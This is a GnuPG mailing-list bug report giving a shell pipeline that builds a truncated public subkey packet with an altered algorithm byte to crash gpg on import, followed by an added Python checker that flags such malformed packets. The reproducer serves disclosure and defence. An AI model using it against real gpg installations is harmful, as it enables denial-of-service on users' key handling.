crash importing truncated subkeys
Tavis Ormandy
taviso at gmail.com
Fri Apr 22 00:19:21 CEST 2022
Hello, I noticed that if there are two opaque identical public subkey
packets, but one is truncated, gpg crashes on import in gcry_mpi_cmp().
I just did this to repro:
$ gpgcompose --public-key taviso --public-subkey taviso \
--user-id anything --public-subkey taviso \
| perl -p -e 's/(\xb9..\x04....)\x01/\1\xff/g' \
| head -c -1 | gpg --import
gpg: premature eof while reading rest of packet
gpg: signal Segmentation fault caught ... exiting
Segmentation fault
That ugly horrible regex is:
\xb9 : Find old-style public-subkey with 2 byte length
.. : skip over the length bytes
\x04 : looking for version 4
.... : skip over the timestamp
\x01 : change the algorithm so it's not recognized by gcry_mpi_cmp.
Then piping it into head to truncate the last packet.
I think it should work on any RSA public key, e.g. just replace
the --public-subkey taviso with the id, 4B092E28 works.
Tavis.
--
_o) $ lynx lock.cmpxchg8b.com
/\\ _o) _o) $ finger taviso at sdf.org
_\_V _( ) _( ) @taviso
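As an added illustration (not part of Tavis's post and not GnuPG code), here is a small pre-import check that walks the OpenPGP packet headers of a key blob and reports any packet whose declared body length overruns the input, which is exactly the shape of the truncated second subkey above. It also flags version 4 public-subkey packets whose algorithm byte is outside the well-known range, since that is what makes gpg keep the packet opaque. The packet bytes in SAMPLE are constructed for this example from the old-style header layout described in the post (0xb9 tag, 2-byte length, version 4, 4-byte timestamp, algorithm byte); the key body bytes are placeholders, not a real key.

```python
"""Pre-import sanity check for an OpenPGP packet stream (example code).

Walks packet headers per RFC 4880 section 4.2 and reports packets whose
declared length runs past the end of the data, plus public subkeys with
an algorithm byte gpg would treat as opaque. Sample data is constructed.
"""
import struct

PUBLIC_SUBKEY = 14
# Public-key algorithm ids registered in RFC 4880 / RFC 6637 / draft EdDSA.
KNOWN_ALGOS = {1, 2, 3, 16, 17, 18, 19, 22}


def parse_header(data, pos):
    """Return (tag, body_offset, body_length) for the packet starting at data[pos]."""
    ctb = data[pos]
    if not ctb & 0x80:
        raise ValueError("byte 0x%02x at offset %d is not a packet tag" % (ctb, pos))
    if ctb & 0x40:
        # New-format header: 6-bit tag, one/two/five-byte length field.
        tag = ctb & 0x3F
        first = data[pos + 1]
        if first < 192:
            return tag, pos + 2, first
        if first < 224:
            return tag, pos + 3, ((first - 192) << 8) + data[pos + 2] + 192
        if first == 255:
            return tag, pos + 6, struct.unpack(">I", data[pos + 2:pos + 6])[0]
        raise ValueError("partial body length at offset %d not supported" % pos)
    # Old-format header: 4-bit tag, 2-bit length type (0xb9 -> tag 14, 2-byte length).
    tag = (ctb >> 2) & 0x0F
    ltype = ctb & 0x03
    if ltype == 0:
        return tag, pos + 2, data[pos + 1]
    if ltype == 1:
        return tag, pos + 3, struct.unpack(">H", data[pos + 1:pos + 3])[0]
    if ltype == 2:
        return tag, pos + 5, struct.unpack(">I", data[pos + 1:pos + 5])[0]
    raise ValueError("indeterminate-length packet at offset %d" % pos)


def check_packets(data):
    """Return one finding dict per packet; stops at the first unparsable header."""
    findings = []
    pos = 0
    while pos < len(data):
        try:
            tag, body, length = parse_header(data, pos)
        except (IndexError, struct.error, ValueError) as exc:
            # Header itself is cut off or malformed: nothing sensible follows it.
            findings.append({"offset": pos, "status": "bad-header", "detail": str(exc)})
            break
        finding = {"offset": pos, "tag": tag, "length": length, "status": "ok"}
        if body + length > len(data):
            # Declared body extends past the end of the input: truncated packet.
            finding["status"] = "truncated"
            finding["missing"] = body + length - len(data)
        elif tag == PUBLIC_SUBKEY and length >= 6 and data[body] == 4:
            # v4 key: version(1) timestamp(4) algorithm(1) then algorithm-specific MPIs.
            algo = data[body + 5]
            if algo not in KNOWN_ALGOS:
                finding["status"] = "unknown-algorithm"
                finding["algorithm"] = algo
        findings.append(finding)
        pos = body + length
    return findings


def make_subkey_packet(algo, key_bytes, timestamp=0x62610000):
    """Build an old-format public-subkey packet with a 2-byte length (constructed data)."""
    body = bytes([4]) + struct.pack(">I", timestamp) + bytes([algo]) + key_bytes
    return bytes([0xB9]) + struct.pack(">H", len(body)) + body


# Constructed sample: an opaque (algorithm 0xff) subkey followed by an identical
# copy with its last byte cut off, mirroring the shape of the crashing input.
OPAQUE = make_subkey_packet(0xFF, b"\x00\x10\xc3\x45")
SAMPLE = OPAQUE + OPAQUE[:-1]

if __name__ == "__main__":
    for f in check_packets(SAMPLE):
        print(f)
```

Run over SAMPLE it reports the first packet as unknown-algorithm and the second as truncated by one byte; a stream like this is worth rejecting (or at least logging) before it reaches a key-import path that assumes every packet is whole.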